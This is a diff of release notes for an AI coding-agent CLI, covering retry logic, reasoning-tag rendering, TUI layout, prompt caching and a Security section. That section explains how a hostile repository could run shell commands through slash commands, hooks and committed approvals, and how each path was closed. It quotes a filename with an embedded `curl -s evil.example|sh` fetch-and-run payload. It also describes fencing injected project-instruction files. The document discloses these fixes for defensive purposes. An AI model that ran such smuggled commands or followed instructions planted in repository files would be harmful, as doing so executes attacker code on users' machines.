+ restarts meant forty independent caps. Provider usage is now written to the `usage` session record
1387
+ type (declared long ago with no writers) and summed back at bootstrap, so `--max-budget-usd`
1388
+ bounds the objective rather than one process. Only tokens are stored — pricing changes between
1389
+ processes — and the restored total is re-priced at the most expensive model involved, keeping it
1390
+ an upper bound, which is the safe direction for a ceiling.
1391
+ - **A dropped stream no longer ends the run.** Every stream failure mapped straight to a terminal
1392
+ outcome and returned, so a twenty-second provider silence, a closed socket, or a suspended laptop
1393
+ killed the turn — and `retry.maxAttempts` could not help, because it covers connection setup only
1394
+ and is out of scope once a 200 response is streaming. The loop already committed everything needed
1395
+ to recover and then discarded it: the partial assistant message is persisted, and every dangling
1396
+ `tool_use` is settled with a `cancelled` result, so the history stays valid to the provider and no
1397
+ tool re-executes. A transport fault now re-sends the turn onto that history, bounded by
1398
+ `retry.streamReissueAttempts` (default 3) with exponential backoff; set it to 0 to restore the
1399
+ previous behavior exactly. Which failures qualify is decided by one `terminalRecovery()`
1400
+ classifier — a budget, a policy block, a cancellation, or a context overflow is still a genuine
1401
+ end — and when the attempts are spent the original diagnosis is preserved rather than replaced.
1402
+ Hitting `max_tokens` now produces an `output_cap` reason instead of `protocol_error`, with its own
1403
+ `retry.outputCapContinuations` allowance so a large generated file cannot drain the budget a real
1404
+ socket drop needs.
1405
+ - **`Stop` and `SessionEnd` fire on every path, and say why the run stopped.** Both were skipped by
1406
+ each early return — a blocked prompt, a context overflow, a spent run budget, an unrecoverable
1407
+ stream error. That gap was defensible for a session a human is watching; it is not when a shell
1408
+ script is the only observer and cannot otherwise distinguish "finished the objective" from "the
1409
+ socket died". They now fire from a `finally`, exactly once, carrying the settled terminal status
1410
+ and reason.
1411
+ - **The spinner keeps its own hue in every built-in theme.** Five of the six themes anchor
1412
+ `shimmerPair` on `assistantAccent` — the agent's own colour — and ease to a lighter tint of it.
1413
+ Nord shipped the pair transposed, so it started on `brand`, and Catppuccin ended its breath on
1414
+ `brand`. Since `brand` is product chrome, and the plan block and the activity row sit on adjacent
1415
+ footer rows, the working line rendered in the plan header's colour: identically in Nord under
1416
+ reduced motion, and once per breath in Catppuccin. Both pairs now follow the convention, and a
1417
+ test over every built-in theme asserts `shimmerPair[0]` is `assistantAccent` and that neither end
1418
+ lands on `brand`, so a new theme cannot reintroduce the collision silently.
1419
+ - **Mouse scrolling, clicking, and copying now work together.** Full-screen mode uses SGR
1420
+ button-event tracking for three-row wheel scrolling, click-to-expand tool summaries, and
1421
+ Claude Code-style drag selection: exact character ranges highlight during a drag, copy to the
1422
+ system clipboard on release, and remain visibly selected until the next interaction. Shift+drag
1423
+ remains available for terminal-native selection. Book clears stale mouse modes before enabling
1424
+ its narrow tracking mode and clears them all on exit; alternate scroll (`?1007`) stays disabled
1425
+ during the session so a wheel nudge cannot become an input-history arrow. Every text field still
1426
+ strips mouse reports and re-seats its cursor, so clicks and drags can never become prompt, URL, or
1427
+ API-key text.
1428
+ - **A run that stops mid-task now says why.** Three faults compounded into a session that simply
1429
+ stopped after a tool result and handed the prompt back, with nothing in the transcript and nothing
1430
+ in the session file to say a request had failed. Reasoning is not always delivered out of band:
1431
+ OpenAI-compatible routers commonly inline it into `content` as `<think>…</think>`, and only the
1432
+ TUI renderer knew to strip those tags. The loop's empty-completion guard tested the raw string, so
1433
+ a turn whose entire output was an empty reasoning block measured fifteen characters, never
1434
+ retried, and ended the run as a normal completion — the guard was dead code against such a
1435
+ provider. The same guard was gated on the stream having reached its terminal event, so a router
1436
+ that closed the socket early skipped it too. And a provider error reached the TUI through a branch
1437
+ that only wrote to a debug logger that is off by default, while the loop's error path skips
1438
+ `onAssistantMessageComplete` — the sole writer to the session store — so neither the failure nor
1439
+ the half-answer that preceded it survived to explain the stop. Reasoning-tag splitting now lives
1440
+ in `src/reasoning-tags.ts`, shared by the loop and the renderer; the loop measures a turn's answer
1441
+ with the tags removed and retries once whether the stream ended cleanly or was cut short,
1442
+ preserving a transport diagnosis rather than replacing it with a generic one. The emptiness test
1443
+ reads only tags the provider actually closed, so an answer that merely opens with an unfenced
1444
+ `<thinking>` is not mistaken for silence. Partial output is now persisted before the loop reports
1445
+ the failure, and the failure itself is written into the transcript — keyed on the run's settled
1446
+ outcome, not on any error event, so a problem the run recovers from (a skill that fails to
1447
+ activate) no longer stamps a failure notice onto a turn that succeeded, and it replaces the
1448
+ transient banner rather than doubling it. What went wrong is visible when it happens and still
1449
+ there after `--resume`.
1450
+ - **A finished answer no longer vanishes into a collapsed thought.** The renderer reads a reasoning
1451
+ tag the provider never closed as reasoning running to the end of the message, which is what keeps a
1452
+ thought out of the answer while it streams. On a settled message that reading is a trap. An
1453
+ OpenAI-compatible router replays a turn's out-of-band reasoning back into history wrapped in
1454
+ `<reasoning_context>` tags, and a model that sees the convention starts emitting it — inconsistently
1455
+ closed. One such turn opened the tag, wrote a complete report, and never closed it, so the
1456
+ transcript filed all fourteen thousand characters as a single thought and collapsed it to one dim
1457
+ `thought` row: indistinguishable from an agent that quit mid-task. The loop had already learned this
1458
+ lesson — its emptiness test reads only tags the provider actually closed — but the renderer had no
1459
+ matching guard, so the two disagreed about whether the turn had answered. `splitReasoningParts` now
1460
+ takes `concluded`, and a turn that is complete and called no tools reads an unterminated block back
1461
+ as answer text, exactly as the loop already does. Both halves of that condition carry weight: a turn
1462
+ that called a tool has not finished speaking and was never at risk, and promoting its narration
1463
+ would publish a thought the reader had collapsed — past `showThinking`, since promoted text renders
1464
+ as markdown and no longer meets that gate. The dangling tag itself is dropped rather than shown,
1465
+ because `marked` renders raw markup as a fenced `html` block and would bury the recovered answer a
1466
+ second time.
1467
+ - **A stream that dies mid-tool-call no longer wedges the session.** A cut stream can carry a
1468
+ finished tool call the loop never got to run. `buildMessages` puts `tool_calls` on the assistant
1469
+ message but emits results only for calls that have one, so that dangling call made every later
1470
+ request malformed — Anthropic rejects a `tool_use` with no matching `tool_result` — and persisting
1471
+ it carried the breakage past a `--resume`. Abandoned calls are now settled with a cancelled result
1472
+ the way an interrupt settles them.
1473
+ - **A retried turn no longer shows the attempt it threw away.** Deltas reach the host as they
1474
+ arrive and cannot be recalled, so when the loop abandoned an attempt and retried, the abandoned
1475
+ reasoning sat in front of its replacement while only the replacement was persisted — the live view
1476
+ and a resumed view disagreed. The loop now emits `attempt_discarded` (new optional
1477
+ `onAttemptDiscarded` callback, and a `stream-json` event of the same name) and the TUI clears the
1478
+ streamed text for that turn. Holding the deltas back instead was rejected deliberately: it would
1479
+ render a long thinking phase as silence, which is the symptom this whole area exists to stop.
1480
+ - **Tool rows sit under the prose that ordered them.** A top-level tool row hung its status
1481
+ glyph at column 0 while prose began at column 2, so a turn read as a list of tool calls with
1482
+ sentences wedged between them — the prose indented from a margin the glyphs owned. Tool rows and
1483
+ managed-agent blocks now carry their gutter one level in, and the grid narrows by exactly what it
1484
+ shifts, so every row keeps its right edge and right-aligned metadata still lines up down the
1485
+ transcript.
1486
+ - **The working indicator's elapsed time rolls up into minutes and hours.** The row rendered a raw
1487
+ second count, so a long turn read `248s` — a figure the reader has to divide before it means
1488
+ anything. It now uses the same duration formatter as subagent rows, background shells and tool
1489
+ rows: `4m 8s`, and `1h 2m 3s` once a turn passes an hour.
1490
+ - **`/review` shows its work instead of going silent for minutes.** The command was dispatched
1491
+ fire-and-forget: it set no state, so no spinner ran; its agents were spawned with no
1492
+ `parentSessionId`, so the session's agent panel and status line filtered every one of them out;
1493
+ and the pipeline emitted its first segment only after the whole run finished. A `--deep` review
1494
+ was up to twenty minutes of a prompt that looked idle. The run now announces its resolved target
1495
+ — file count, base, path scope, and which passes are coming — before the first agent starts, and
1496
+ every reviewer, lens, verifier and patcher appears live in the agent panel while it works.
1497
+ Ownership was conflated with delivery: agents can now be owned by a session for display while
1498
+ suppressing the completion notification separately (`notifyParentOnCompletion`), so live progress
1499
+ costs no extra model turn to re-narrate a report the host already rendered. Progress goes only to
1500
+ a host that renders as segments arrive, so `book -p /review` stdout is unchanged — a print run has
1501
+ no silence to break, and the announced target is already on `data.target`.
1502
+ - **A review is scoped to the conversation that asked for it.** Nothing cancelled a running review
1503
+ when the session was replaced, so after a `/new` its report was appended to a conversation that
1504
+ never requested it, its agents were invisible (they belong to the old session), and it still held
1505
+ the single-review slot, refusing a `/review` typed in the new one.
1506
+ - **A local message produced mid-turn is deferred, not discarded.** `addLocalMessage` returned early
1507
+ whenever a send was in flight, which was correct about not clobbering a streaming turn and wrong
1508
+ about what to do instead. Because `/review` runs for minutes and looked idle the whole time, the
1509
+ natural thing to do — start another turn — silently threw away the entire review report. Blocked
1510
+ messages are now queued and replayed in order once the turn ends; a message owed to a
1511
+ conversation the user has since left is still dropped, deliberately.
1512
+ - **Esc cancels a running review; Ctrl+C no longer exits the app during one.** Neither key treated a
1513
+ review as in-flight work, so Esc was a documented no-op and Ctrl+C fell through to session exit —
1514
+ killing Book and orphaning the agents the review had spawned. Both now cancel the review, which
1515
+ stops its in-flight agents; a second Ctrl+C still exits, exactly as it does mid-stream. A
1516
+ cancelled review reports `inconclusive` with no findings rather than presenting the coverage
1517
+ failure from its own stopped agents as a result, and a cancelled `--fix` pass reports what it had
1518
+ already committed before stopping.
1519
+ - **A running tool row no longer shifts a column when it finishes.** `Spinner` already emits its
1520
+ own trailing space and the row added a second one, so a running row's gutter was three columns
1521
+ and a finished one's was two — the verb and everything after it jumped left the instant the tool
1522
+ completed, which is the single-column invariant the grid exists to hold.
1523
+ - **Our width model agreed with the renderer for `✓`.** The width table marked the whole Dingbats
1524
+ block as two columns wide, but it also holds the East-Asian _ambiguous_ marks — `✓`, `✗` — which
1525
+ terminals and Ink's own layout render one column wide. The block is now narrowed to its
1526
+ emoji-presentation members, and a test pins every status glyph's width against the renderer.
1527
+ - **The branch shows when `book` is launched from a subdirectory.** Repository detection probed for
1528
+ a `.git` entry, which only exists at the repository root, so the footer's new branch segment was
1529
+ silently absent anywhere below it. `git rev-parse` now decides.
1530
+ - **A malformed custom theme no longer crashes the TUI on the first spinner frame.**
1531
+ `.book/themes/*.json` is merged into the token set without validation, so a `shimmerPair` that is
1532
+ empty, short, or not an array reached the interpolator and threw.
1533
+ - **Context pressure survives a narrow footer.** Segment packing skips what does not fit and keeps
1534
+ later, shorter segments, so `ctx 5%` was dropped while the branch behind it was admitted — losing
1535
+ the one figure the row exists to show. The label drops before the number does.
1536
+ - **A reasoning tag inside a fenced code block stays in the answer.** Tag splitting ran before
1537
+ markdown parsing with no fence awareness, so an answer quoting a prompt template had that region
1538
+ torn out and rendered as a collapsed thought, silently emptying the code block.
1539
+ - **`Bash` rows are not painted in the dim path colour.** The directory/basename brightness ramp
1540
+ assumed a filesystem path, but a `Bash` target is a command: `npx vitest run src/tui/` split at
1541
+ the trailing slash, leaving an empty basename and rendering the row's only content at its
1542
+ faintest. The ramp now applies to real paths only.
1543
+ - **The status line and working indicator share the transcript's measure.** Both sized themselves
1544
+ from the raw terminal width rather than from the grid, so they could not stay in step with the
1545
+ rows above them when that measure changed.
1546
+ - **The status-line git poll no longer re-renders the app every five seconds.** `useGitStatus`
1547
+ allocates a fresh status object per tick and returned it unconditionally, so wiring it into the
1548
+ footer made the whole tree reconcile twelve times a minute in an idle session for no visual
1549
+ change. It now keeps the previous object when the branch, tree and error are unchanged.
1550
+ - **The virtual transcript estimates row heights against the measure it actually renders at.** The
1551
+ estimator wrapped against the raw terminal width rather than the row's own measure, so off-screen
1552
+ messages were estimated well short of their true height, drifting scroll position and the "older
1553
+ entries hidden" threshold. A user turn's rule row is counted too, and the estimate measures
1554
+ display width rather than code units — a line of CJK or emoji occupies twice the columns its
1555
+ `.length` reports, and was counted at half its real height.
1556
+ - **An inline-label tool row no longer clips its target early.** The width budget subtracted the
1557
+ verb's width from a string that already contained the verb, so a narrow-terminal row lost exactly
1558
+ that many characters off its command and padded the columns back as spaces.
1559
+ - **Heading depth is legible again.** `mdHeadingH1` had been set to the body text colour, so with
1560
+ the `###` markers gone `# Title`, `### Sub` and a bold run of body copy all rendered identically.
1561
+ The three heading steps are now distinct in both built-in themes, and a test enforces it.
1562
+
1563
+ ### Changed
1564
+
1565
+ - **The activity wording is shorter, funnier, and covers the whole tool set.** The row is one line
1566
+ and the label shares it with an elapsed time and a keyboard hint, so a phrase is only the frame —
1567
+ the target inside it, a path or a pattern or a shell command, is the part worth reading.
1568
+ `Peeking between the covers of` spent 29 of about 50 columns on the joke and then truncated the
1569
+ filename it was introducing; every phrase now fits a 28-column budget a test enforces, and the
1570
+ short ones land the gag sooner. The reasoning rotation grew from twelve lines to twenty-eight, so
1571
+ a minute of thinking no longer loops, and each line is a joke about thinking rather than a claim
1572
+ of progress the indicator cannot check. Phrases moved out of the switch into one catalog that can
1573
+ be read in a single sitting, and the tools that used to fall through to `Trying agent spawn on…`
1574
+ — the managed-agent and evidence families, `ToolSearch`, `ReadSkillResource`, `DismissShell` —
1575
+ now have their own. `ApplyPatch` names the file its envelope touches instead of saying
1576
+ `workspace files`, and a phrase that ends in a colon drops it when the call carries no target.
1577
+ The blocked labels stay plain: when the run has stopped to ask the reader for something, a joke
1578
+ is in the way.
1579
+ - **The plan block and the working line are now told apart at a glance.** The activity row used to
1580
+ set its wording in `text`, the same colour as body prose, plan steps and tool targets, so the one
1581
+ row that is actually changing was the hardest row to pick out: a moving glyph welded to a sentence
1582
+ that looked like every other sentence. The spinner glyph and its wording now share the spinner's
1583
+ own sage — the agent's voice — and read as a single live element, with the elapsed duration and
1584
+ the keyboard hint receding behind it in two quieter weights. Blocked and retrying rows keep their
1585
+ status colours, because those are not the agent talking. The plan takes clay, product chrome's
1586
+ hue, so the two blocks never compete. Its header carries a meter of one cell per step, a scale
1587
+ model of the rows beneath it, and the rows themselves run in three weights: finished steps struck
1588
+ through and receded, queued steps quiet, the step in flight the only one set in full text colour
1589
+ and bold. Plan markers moved off `○`/`◉`, which are East Asian _Ambiguous_ — terminals that draw
1590
+ them two cells wide swallowed the space behind them, so plan rows landed a column left of every
1591
+ other row and butted against their own marker — onto the `✓`/`›`/`·` vocabulary the rest of the
1592
+ TUI already renders one cell wide. A long step now truncates to the content measure instead of
1593
+ wrapping back under the marker column, where the overflow read as a new item.
1594
+ - **Zero-Mem is now an explicitly named experiment and is unavailable by default.** Production
1595
+ `compactStrategy` accepts only `summary`; the normal `/config` menu, `R` shortcut, and
1596
+ `/config compact-strategy` selector no longer expose Zero-Mem. Activation requires strict
1597
+ `BOOK_EXPERIMENTAL_ZERO_MEM=true`, `experimental.zeroMem: true` in the user-global
1598
+ `<BOOK_HOME>/settings.json`, or an explicit `--settings` document. Both workspace settings layers
1599
+ are withheld from enabling experimental capabilities so a clone cannot opt the user in, and local
1600
+ `/config`/`book config set` writes refuse the key rather than pretending it will take effect.
1601
+ Legacy `compactStrategy: "zero-mem"` and `BOOK_COMPACT_STRATEGY=zero-mem` selectors fail with
1602
+ migration guidance; explicitly enabled main-agent runs keep query-time retrieval while subagents
1603
+ retain summary compaction.
1604
+ - **The TUI now lays every row out on one grid, and the palette gives every role its own hue.**
1605
+ A transcript row is `[gutter][content]`: the gutter is two columns wide and carries status (a
1606
+ glyph, a rail, a spinner), and content always begins on the same column. Before this, each
1607
+ component picked its own `marginLeft` and its own `width - N` budget, so content landed on
1608
+ columns 1, 2, 4 and 5 and nothing could be scanned down. `src/tui/layout.ts` is the single
1609
+ source of truth; bordered surfaces (composer, menus, permission prompt) now sit flush at column
1610
+ 0 so their border plus one column of padding lands their text on the same content column.
1611
+ - _Tool rows are three aligned columns_: `[verb] [target] … [meta]`, with metadata flush right
1612
+ so `8 lines`, `+3 -2` and `exit 1` line up down the transcript instead of trailing a
1613
+ `·`-chain. The verb is never truncated — a row whose label will not fit the column runs
1614
+ inline instead. A failing row may spend up to half its width on the error message, which
1615
+ previously got clipped to twenty columns while the command it failed on kept the rest.
1616
+ - _Consecutive tool rows no longer have a blank row between them_ (`toolRowGap` is 0, and the
1617
+ new `toolBlockGap` puts the breathing room before the block), so a run of actions reads as
1618
+ one column.
1619
+ - _A user turn opens with a labelled rule_ — `── you ─────── 10:55 ──` — replacing the tinted
1620
+ card with an accent rail. A transcript with no turn boundary is a wall of same-weight rows;
1621
+ this is the element that lets you find where an exchange began when scrolling back.
1622
+ - _Code blocks lost their four-sided border_ in favour of a left rail plus the code tint. The
1623
+ box was the heaviest element in an answer, wrapped around its smallest, and cost four columns
1624
+ where the rail costs two. Full borders are now reserved for surfaces that want your input.
1625
+ - _Headings carry hierarchy through weight and brightness_, not `═══ TEXT ═══` / `── text ──`
1626
+ side chrome, which competed with the turn rule and made an in-answer heading look like a
1627
+ transcript boundary. `# Heading` is no longer upper-cased.
1628
+ - _List markers are sized per list_ rather than to a fixed three columns, so a bullet no longer
1629
+ leaves a dead column and an ordered list does not shear its text between items 9 and 10.
1630
+ - **The palette separates roles that used to share one colour.** `#AFC19D` was simultaneously
1631
+ `brand`, `assistantAccent`, `modeDefault`, `mdHeadingH1`, `mdLink` and `usageMeter` — six
1632
+ semantically different things rendering identically. Sage now belongs to the agent, clay to
1633
+ product chrome and user-authored content, teal to references and the usage meter, and the
1634
+ amber/rust/green trio to status; `default` permission mode is desaturated so an agent turn never
1635
+ reads as a mode signal. Both the dark and light built-ins are checked for role distinctness by
1636
+ test rather than by pinned hex values.
1637
+ - **The status line leads with what matters and shows the branch.** `useGitStatus` existed with no
1638
+ consumer; the footer now shows the current branch and marks a dirty tree, leads with a mode chip
1639
+ in the mode's own colour, and always colours context pressure (previously grey until 80%, which
1640
+ left the whole row a flat monotone). Segments are separated by space rather than `·`, since
1641
+ colour now does that work.
1642
+ - **The transcript reads as a hierarchy instead of a flat list.** Tool rows and answer prose
1643
+ rendered at the same weight, so in a session that is mostly machinery the conclusion had to be
1644
+ hunted for. There is now a ramp: headings brightest, prose next, tool targets a step below, and
1645
+ verbs and directory prefixes dimmest. A path's basename outranks its directory, since twenty rows
1646
+ of `src/review/` are identical and the filename is what distinguishes them.
1647
+ - _A finished thought collapses to `▸ thought · 4 lines`._ Watching reasoning arrive is the point
1648
+ of showing it; re-reading it in scrollback is not. Expanded by default it put the least
1649
+ important content of a turn several rows above the first sentence of the answer. Live reasoning
1650
+ still streams in full, and detailed mode (Ctrl+O) reopens a finished one.
1651
+ - _The `answer ────────` divider is gone._ It announced the answer only when the turn happened to
1652
+ contain reasoning, and trailed a stub rule that went nowhere. Screen readers keep the spoken
1653
+ boundary, which they cannot infer from spacing.
1654
+ - _Byte counts and whole-file line ranges are gone._ `2 lines, 51 B` and `121 lines · 1-121` rode
1655
+ along on nearly every row; the range now appears only when a read started partway into a file.
1656
+ - _Churn counts are coloured_ — `+33` green, `-2` rust — so the figures a reader scans for are the
1657
+ ones that carry colour.
1658
+ - _A file edit is called `Edit` everywhere._ `deriveToolPresentation` said `Update` while the
1659
+ aggregate heading said `Edit`, so the measured label column disagreed with the rendered one.
1660
+ - _Label-column widths snap to 4, 6 or 10_ rather than each turn's exact widest label. Exact
1661
+ per-turn sizing closed the gulf inside a turn but left two adjacent turns on different columns.
1662
+ - **One grid owns every row's horizontal position.** On a wide terminal nothing bounded the row
1663
+ width, so right-aligned metadata ended up 170 columns from the command it described — aligned
1664
+ with nothing the eye could hold. The transcript, the composer and the status line now resolve
1665
+ their measure in one place instead of each picking its own. (Later in this release that measure
1666
+ was split: content follows the terminal, while floating panels and aligned tool rows stay bounded
1667
+ — see "The TUI uses the whole terminal" above, which is the end state.)
1668
+ - _The label column is sized per turn_ rather than to a fixed ten columns. A turn of `Bash` /
1669
+ `Read` / `Grep` rows left seven dead columns between every verb and its target.
1670
+ - _A failing row now takes as much width as its message needs_, capped, and never enough to
1671
+ push the target below a readable minimum. The previous half-the-width ratio clipped
1672
+ `'tail' is not recognized as an internal or external command` by one character.
1673
+ - _Reasoning tags beyond `<think>`_ (`<thinking>`, `<reasoning>`, `<reasoning_context>`) are
1674
+ recognized. An unhandled tag reached `marked` as raw markup, so the transcript grew a code
1675
+ block labelled `html` containing the model's private reasoning.
1676
+ - _Thinking blocks lost their fill_, keeping only the rail. Reasoning is the least important
1677
+ content in a turn and was rendering as the heaviest block on screen.
1678
+ - **Left rails now actually render.** Expanded tool output, blockquotes and thinking blocks each
1679
+ set `borderLeft` and a border colour but never a `borderStyle`, which Ink treats as no border at
1680
+ all — so `toolRail`, `mdBlockquoteBorder` and `mdThinkBorder` were configured and never drawn.
1681
+ Those blocks were indistinguishable from indented prose.
1682
+ - **The welcome screen no longer advertises commands that do not exist.** Hints were truncated per
1683
+ segment inside a row that also held fixed separators, so a 50-column terminal rendered
1684
+ `/hel commands` and `·@file`. Hints are now packed whole — the last one is dropped rather than
1685
+ clipped — and the tagline orients a first-run user instead of describing the product.
1686
+
1687
+ - **Anthropic sessions now cache the conversation, cutting input cost on long sessions by roughly
1688
+ an order of magnitude.** Book placed no cache breakpoint on the message stream, so the whole
1689
+ history — 50-150k tokens mid-session — was re-billed at full input price on every turn. A moving
1690
+ breakpoint on the newest message means a steady-state turn re-buys roughly the newest turn
1691
+ instead of the whole context; cache reads are about a tenth of the input price, and time to first
1692
+ token drops with the cost. Book also marked _every_ tool definition, far past Anthropic's
1693
+ four-breakpoint limit; only the last tool is marked now, which caches identically.
1694
+ - **The system prompt is now organized by how often its content changes.** Current date, git
1695
+ status, the plan-mode notice, and the todo list have left the system prompt: they sit ahead of
1696
+ the message history in the cache prefix, so a dirty file or a plan-mode toggle used to
1697
+ invalidate the entire conversation. Per-turn state is delivered as a `<session-state>` block on
1698
+ the newest user turn, and active skill frames moved from the cached prefix to the uncached
1699
+ dynamic suffix, so activating a skill no longer invalidates the whole prompt.
1700
+ - _Todo state now travels through TodoWrite's own tool result_, which already echoes the full
1701
+ list into the message stream. The list is no longer restated in the system prompt each turn.
1702
+ - _Checkpoint freshness_ is no longer re-stamped into the historical checkpoint message. The
1703
+ same hash comparison runs once per turn and reports drift as `Stale since checkpoint: …` in
1704
+ the newest session-state block.
1705
+ - **`SYSTEM_PROMPT_VERSION` is now `book-system-prompt-v2`.** Run-ambient records stamp this
1706
+ version, so harness evidence recorded under v1 is not comparable with v2-era runs. Evidence
1707
+ accumulated through a durability backend that claims `verified` is reset by this bump.
1708
+ - **Project instructions are fenced.** `CLAUDE.md` / `AGENTS.md` / rules content is wrapped in
1709
+ `<project-instructions>` with a `<source path scope>` element per file, and fence markup inside
1710
+ a source body is neutralized. Previously an injected file's own `#` headings broke straight out
1711
+ of the `## Project instructions` section, so a repo file containing `## Guardrails` rendered at
1712
+ the same level as the real one. Trust framing now precedes the fenced content instead of
1713
+ arriving in the closing guardrails.
1714
+ - **The system prompt states harness facts it never used to**: how output is rendered, the
1715
+ `file_path:line` convention, which shell Bash spawns per platform (`cmd.exe` on Windows, not a
1716
+ POSIX shell), what a denied tool call means, that hook output is user-configured feedback, and
1717
+ that time-sensitive facts need verifying. The machine hostname is no longer sent to the provider.
1718
+ - **The `## Available tools` section is gone.** It restated, with truncated descriptions, the tool
1719
+ schemas the API already delivers verbatim. The deferred-tool catalog remains, since it describes
1720
+ tools the model genuinely cannot see. Operating principles lost the bullets that restate a
1721
+ frontier model's own defaults.
1722
+ - **Truncated listings now say so.** Command and subagent listings that hit their character budget
1723
+ append `- …and N more not shown` instead of stopping silently after one bare name. The skills
1724
+ listing already reported its omissions.
1725
+ - **Node.js 22.13.0 or newer is now required** (previously 20). Node.js 20 reached end-of-life on
1726
+ 2026-04-30, and 22.13.0 is where `node:sqlite` stopped requiring `--experimental-sqlite`. CI
1727
+ exercises Node.js 22 and 24 on Ubuntu and Windows.
1728
+
1729
+ ### Security
1730
+
1731
+ - **A repository can no longer approve its own slash commands by committing
1732
+ `.book/settings.local.json`.** Project command approvals were the last of four
1733
+ repository-controlled input classes still read from inside the working tree. `.gitignore` does
1734
+ not stop a _tracked_ file from reaching a clone, so `git add -f .book/settings.local.json`
1735
+ shipped a project's own `commands.projectCommands` decisions with it — and because the
1736
+ fingerprint they carry is a digest of a body the repository also wrote, a hostile project could
1737
+ precompute a matching one and arrive pre-approved, releasing its shell on the first `/name` or
1738
+ `book -p "/name"`. Decisions now live in `~/.book/trust.json` alongside the MCP, allow-rule, and
1739
+ hook decisions, keyed by workspace path, and **both** workspace settings layers are stripped of
1740
+ the key. Record one with `book trust command <name>` (`--all-pending`, `--reject`, and
1741
+ `--workspace` all work as they do for `hook` and `rule`); `book doctor` prints the line for what
1742
+ is withheld. Approvals previously recorded in `.book/settings.local.json` are not migrated —
1743
+ reading them back to convert them is the same trust the move exists to withdraw — so each is
1744
+ asked once more, on the machine that decides.
1745
+
1746
+ - **`book config set` refuses the four trust-owned settings paths.** They are stripped from the
1747
+ layer `config set` writes, so `book config set commands.projectCommands …` — the line Book
1748
+ itself used to print — would report success and change nothing on the next load. It now exits
1749
+ non-zero and names the `book trust` command that records the decision instead. The refusal
1750
+ matches ancestors and descendants of each path, not just the exact key: replacing a whole
1751
+ section with `book config set commands '{"projectCommands":…}'` is the same silently-stripped
1752
+ write by another route.
1753
+
1754
+ - **A project command is never approved by name alone.** `book doctor` now lists each withheld
1755
+ command with the shell it would run, the way it already lists a withheld hook's command,
1756
+ matcher, and environment, and `book trust command --all-pending` prints each command's shell
1757
+ before recording the grant — a bulk decision against a list of names was approval without
1758
+ reading. A command's name is a filename the repository chose, so it is also now stripped of
1759
+ terminal control characters wherever it is displayed, and a name that is not a plain filename
1760
+ gets no copy-and-paste `book trust command <name>` line at all: a repository shipping
1761
+ ``.book/commands/deploy`curl -s evil.example|sh`.md`` would otherwise have had its payload
1762
+ printed as a command to paste, and run by the act of approving.
1763
+
1764
+ - **The trust store version is now 2.** `projectCommands` is readable by a version-1 build, which
1765
+ is the problem: writes go through the schema, unknown keys are dropped, and a version-1 build
1766
+ recording any hook, rule, or MCP decision would silently erase that workspace's command
1767
+ approvals. A version-1 build now reports a version-2 store as unreadable, withholds every gated
1768
+ declaration, and declines to write, rather than quietly discarding decisions.
1769
+
1770
+ - **A checked-in slash command can no longer run shell on your machine just because you typed
1771
+ its name.** A `.book/commands/*.md` body may substitute shell output into its prompt, and that
1772
+ substitution ran before the model saw anything, outside the permission system and outside the
1773
+ sandbox — no rule consulted, no sandbox applied, nothing asked. Cloning a repository and
1774
+ invoking one of its commands was therefore arbitrary code execution, and print mode had widened
1775
+ the exposure: `book -p "/name"` reaches the same resolver with no terminal present to notice.
1776
+ Repository-declared commands that substitute shell now require a one-time decision, recorded in
1777
+ `~/.book/trust.json` and keyed by workspace path, so nothing inside the working tree can answer
1778
+ for it. Until a
1779
+ decision exists the command is refused, naming the shell it wanted to run and the command that
1780
+ approves it; `book doctor` lists what is withheld. The recorded fingerprint covers the shell a
1781
+ body runs, not the prose around it, so editing what runs asks again while rewording the
1782
+ instructions does not. Commands in `~/.book/commands/` are yours and are never gated, and a
1783
+ project command that substitutes no shell is unaffected.
1784
+
1785
+ - **Slash-command shell output is no longer rescanned for further substitution.** Fenced blocks
1786
+ were resolved first and the _result_ was then scanned for inline ``!`cmd` `` spans, so a block
1787
+ whose output contained an injection marker had it executed as a second command. Spans are now
1788
+ taken from one scan of the original body and output is substituted back without rescanning —
1789
+ which is also what lets an approval fingerprint mean exactly what will run.
1790
+ - **A repository can no longer widen your permissions by shipping a `permissions.allow` rule.**
1791
+ Allow rules accumulate across settings layers, so a rule in a cloned repository's checked-in
1792
+ `.book/settings.json` joined the effective allow list — reaching the outcome that project layers
1793
+ are already forbidden from selecting via `defaultMode: bypassPermissions`. Once merged a rule
1794
+ carried no provenance, so nothing downstream could tell a repository's grant from your own. Such
1795
+ rules are now withheld until you record a decision, stored per workspace in `~/.book/trust.json`.
1796
+ `ask` and `deny` rules are unaffected: they only ever restrict. `book doctor` lists what is
1797
+ withheld and prints the `book trust rule` command that grants it.
1798
+
1799
+ - **A repository can no longer run shell commands through project-declared hooks without your
1800
+ approval.** A `hooks.<event>` entry in a cloned repository's checked-in `.book/settings.json`
1801
+ is a command Book executes at lifecycle events — on every prompt, around every tool call, at
1802
+ session start. Once merged into resolved settings an entry carried no provenance, so nothing
1803
+ downstream could tell a repository's hook from your own. Project-declared entries are now
1804
+ withheld until you record a decision, stored per workspace in `~/.book/trust.json` and keyed by a
1805
+ fingerprint of the event, matcher, command, and env — editing any of those reverts the hook to
1806
+ untrusted. User-global and local-layer hooks are unaffected. Print/headless and SDK runs report
1807
+ what they are skipping, and `book doctor` lists each withheld hook — command, matcher, and
1808
+ environment, since approval covers all three — and prints the `book trust hook` command that
1809
+ grants it.
1810
+
1811
+ - **Trust decisions moved out of the workspace, into `~/.book/trust.json`.** `mcp.projectServers`,
1812
+ `permissions.projectAllowRules`, and `hooks.projectEntries` recorded your answer about
1813
+ repository-controlled input, and were read from `.book/settings.local.json` on the reasoning that
1814
+ the file is gitignored. `.gitignore` does not stop a _tracked_ file from reaching a clone:
1815
+ `git add -f .book/settings.local.json` ships it with the repository, and every fingerprint the
1816
+ store is keyed by is a digest of configuration the repository already controls. A hostile project
1817
+ could therefore precompute approvals for the hooks, servers, and allow rules it also shipped and
1818
+ arrive pre-trusted — releasing arbitrary shell commands on first run. All three keys are now
1819
+ ignored from **both** workspace layers and read from a user-global store keyed by absolute
1820
+ workspace path, which nothing a repository can write reaches. An unreadable or off-schema store
1821
+ records no decisions, withholding the gated input rather than releasing it, and a write refuses
1822
+ rather than overwrite a store it could not parse. Decisions recorded under the old scheme are not
1823
+ migrated — that would import exactly the approvals this closes — so a project whose hooks or
1824
+ servers you had already approved asks once more.
1825
+
1826
+ - **New `book trust` subcommand records those decisions**: `book trust hook <fingerprint>` and
1827
+ `book trust rule <rule>`, each taking `--all-pending`, `--reject`, and `--workspace <path>`.
1828
